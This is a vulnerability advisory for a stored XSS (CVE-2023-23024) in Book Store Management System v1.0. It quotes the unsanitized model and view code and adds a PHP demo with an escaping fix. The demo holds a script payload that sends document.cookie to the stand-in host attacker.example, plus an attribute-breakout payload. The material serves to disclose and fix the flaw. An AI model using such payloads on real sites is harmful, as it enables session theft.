Headline
CVE-2023-23024: XSS in Book Store
Book Store Management System v1.0 contains a stored cross-site scripting (XSS) vulnerability in /bsms_ci/index.php/book: the writer parameter is written to the database unsanitized and later rendered in a view without HTML escaping, so an attacker can execute arbitrary web script or HTML in the browser of anyone who views the book list via a crafted payload in that parameter.
The original report counts 50 XSS vulnerabilities of this kind in the project. The affected values come from several sources, and each is saved to the database exactly as submitted:
// In file application/models/M_book.php
// Every field is taken straight from the POST body; no validation or
// sanitization is applied before the row is inserted.
$object = array(
    'book_title'    => $this->input->post('book_title'),
    'year'          => $this->input->post('year'),
    'price'         => $this->input->post('price'),
    'category_code' => $this->input->post('category'),
    'publisher'     => $this->input->post('publisher'),
    'writer'        => $this->input->post('writer'),   // the parameter named in the CVE
    'stock'         => $this->input->post('stock')
);
return $this->db->insert('book', $object);

// In file application/models/M_transaction.php
// Same pattern: user_code, buyer_name and bookname are stored as received.
$object = array(
    'user_code'  => $this->input->post('user_code'),
    'buyer_name' => $this->input->post('buyer_name'),
    'tgl'        => date('Y-m-d'),
    'total'      => $this->input->post('total'),
    'bookname'   => $this->input->post('bookname'),
    'book_qty'   => $this->input->post('book_qty'),
);
$this->db->insert('transaction', $object);
These stored values are later read back from the database and echoed into the view files with the short echo tag, without any HTML escaping:
// In file application/views/v_book.php
// Each cell interpolates the stored string directly into the HTML body.
<td><?=$book->book_title?></td>
<td><?=$book->year?></td>
<td><?=$book->category_name?></td>
<td><?=$book->publisher?></td>
<td><?=$book->writer?></td>
<td><?=$book->stock?></td>

// In file application/views/v_transaction.php
<td><?=$book->book_title?></td>
<td><?=$book->category_name?></td>
<td class="text-right">$<?=$book->price?></td>
<td class="text-right"><?=$book->stock?></td>

// Also in v_transaction.php: user_code lands inside an attribute value and
// fullname inside the option text, both unescaped. (The loop variable shadows
// the array it iterates; that is the project's code as written.)
<?php foreach ($transaction as $transaction): ?>
    <option class="text-dark" value="<?=$transaction->user_code?>"><?=$transaction->fullname?></option>
<?php endforeach ?>
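The following is an added example, not code from Book Store Management System or from the original report. It reproduces the sink pattern above with a constructed book record whose writer field holds a script payload, shows what the vulnerable `<?=$book->writer?>` cell and the `value="<?=$transaction->user_code?>"` attribute emit, and places the hardened rendering beside it. The `e()` helper and the `render_*` / `contains_markup` functions are assumptions made for this example; the `$book` and `$transaction` objects and the payload are constructed here.

```php
<?php
// Added example (not the project's code). Demonstrates the stored-XSS sink from
// application/views/v_book.php and v_transaction.php and the output-encoding fix.

// Constructed stored rows: what an attacker could submit in the writer field and
// in the user_code field, and what the models above would save verbatim.
$book = (object) [
    'book_title' => 'Clean Code',
    'writer'     => '<script>new Image().src="https://attacker.example/c?"+document.cookie</script>',
];
$transaction = (object) [
    'user_code' => '"><script>alert(document.domain)</script>',
    'fullname'  => 'Alice',
];

// Vulnerable rendering, equivalent to <td><?=$book->writer?></td>: the stored string
// becomes part of the HTML document, so the <script> element is parsed and executed.
function render_writer_vulnerable(object $book): string
{
    return '<td>' . $book->writer . '</td>';
}

// Vulnerable attribute context, equivalent to value="<?=$transaction->user_code?>":
// the stored '"' closes the attribute and the rest is parsed as new markup.
function render_option_vulnerable(object $t): string
{
    return '<option class="text-dark" value="' . $t->user_code . '">' . $t->fullname . '</option>';
}

// Hardened output encoding. ENT_QUOTES encodes both quote styles, so one helper is
// safe in element content and in double- or single-quoted attribute values.
// CodeIgniter 3 ships html_escape(), which wraps htmlspecialchars() the same way;
// a plain helper is used here so the script runs stand-alone (assumption).
function e(?string $value): string
{
    return htmlspecialchars((string) $value, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

function render_writer_fixed(object $book): string
{
    return '<td>' . e($book->writer) . '</td>';
}

function render_option_fixed(object $t): string
{
    return '<option class="text-dark" value="' . e($t->user_code) . '">' . e($t->fullname) . '</option>';
}

// Reviewer check: does any user-supplied character survive as a raw '<', '>', '"'
// or "'" inside the rendered fragment once the fixed template's own markup is removed?
function contains_markup(string $rendered, string $template_prefix, string $template_suffix): bool
{
    $inner = substr($rendered, strlen($template_prefix), strlen($rendered) - strlen($template_prefix) - strlen($template_suffix));
    return (bool) preg_match('/[<>"\']/', $inner);
}

$cases = [
    'writer vulnerable' => [render_writer_vulnerable($book), '<td>', '</td>'],
    'writer fixed'      => [render_writer_fixed($book), '<td>', '</td>'],
];

foreach ($cases as $name => [$html, $prefix, $suffix]) {
    printf("%-18s %s\n", $name . ':', $html);
    printf("%-18s raw markup reaches browser: %s\n", '', contains_markup($html, $prefix, $suffix) ? 'yes' : 'no');
}

echo "option vulnerable: " . render_option_vulnerable($transaction) . "\n";
echo "option fixed:      " . render_option_fixed($transaction) . "\n";
```

Running it shows the vulnerable cell carrying a live `<script>` element and the vulnerable option breaking out of its `value` attribute, while the fixed versions emit `&lt;script&gt;` and `&quot;&gt;` so the browser renders text rather than markup. The fix belongs at output, in every view that echoes a stored value, because the same row is reused across v_book.php and v_transaction.php; CodeIgniter 3 also accepts `TRUE` as the second argument of `$this->input->post()` to run its `xss_clean` filter on the way in, but that is a blocklist-style filter and is not a substitute for context-aware escaping where the data is rendered.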